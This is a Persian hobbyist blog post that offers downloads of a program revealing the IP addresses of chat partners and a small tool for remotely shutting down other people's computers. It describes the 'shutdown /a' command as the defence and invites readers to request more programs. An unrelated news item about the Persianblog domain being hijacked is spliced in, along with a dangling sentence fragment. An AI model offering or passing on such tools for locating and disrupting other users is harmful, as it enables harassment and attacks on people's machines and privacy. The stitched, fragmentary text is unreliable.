حالا یه مشکل دیگه . بعضی از دوستان و تازه کارا نمیتونن آی پی طرف رو بدست بیارن . من اینجا یه برنامه واستون میزارم که وقتی اجراش کنید آی پی هر کسی رو که باهاش چت میکنید رو نشون میده !! البته راه های دیگه ای هم هست واسه بدست آوردن آی پی از طریق Netstat و ... اما بعضی وقتا آی پی طرف رو نشون نمیده ! چرا ؟ چون ممکنه طرف از ترفند های پنهان کردن آی پی یا از برنامه اش استفاده میکنه ، البته اینو بگم کسانی هم که از Zone Alarm Internet Security Suite و Kaspersky Internet Security و ... استفاده میکنن رو هم یه فیلتر دارن که آی پی شون رو توی چت نشون نمیده!!! توصیه میکنم از این برنامه ها استفاده کتید .
دانلود برنامه اول همون که کامپیوتر رو خاموش میکنه 100kb
حالا آنتی این برنامه : وقتی کسی با همچین برنامه ای به شما حمله میکنه یه Error بهتون میده که بعد از 30 ثانیه کامپیوترتون خاموش میشه ، توی این 30 ثانیه فورآ باید از منوی Start گزینه RUN رو انتخاب کنید و بنویسید shutdown /a و OK کنید . بعد میبینید اون Error میره و کامپیوتر خاموش نمیشه !
امیدوارم استفاده لازم رو برده باشید ، این برنامه رو فقط واسه دفاع از خود گذاشتم ، امیدوارم توی همین راه هم استفاده بشه . هر کمک و مشکلی هم داشتین توی قسمت نظرات بیان کنید . هر برنامه ای هم میخواید بگید میذارم واستون . موفق باشید .
سایت پرشین بلاگ به زودی بر روی دامنه اختصاصی ایران (دات آی آر) قابل مشاهده خواهد بود و تلاش برای بازگرداندن دامنه دات کام همچنان ادامه دارد.
مدیر پشین بلاگ در گفتگو با خبرنگارمهر با اعلام این خبر افزود : بعد ازسرقت دامنه سایت پرشین بلاگ ما اقدام به راه اندازی دامنه persianblog.ir بر روی دامنه اختصاصی ایران کرده ایم که به زودی کاربران پرشین بلاگ برای دسترسی به صفحه شخصی خود می توانند از این دامنه به جای دامنه «com.» استفاده کنند.
مهدی بوترابی افزود : این اقدام برای نشان این مسئله صورت می گیرد که نشان دهیم هکرها نتوانسته اند به بانک اطلاعات سایت دسترسی داشته باشند و کاربران از این بابت نگرانی نداشته باشند.
وی خاطرنشان کرد : هکرها تنها توانسته اند آدرس های ما را از روی دامنه پرشین بلاگ دات کام تغییر دهند و این مشکل به زودی از سوی شرکت خارجی میزبان دامنه ما برطرف می شود.
که خود را عراقی معرفی کرده بودند، 
دوستانی که برنامه یا کتابی در نظر دارن توی قسمت نظرات بیان کنن تا واسشون بزارم . موفق باشید .
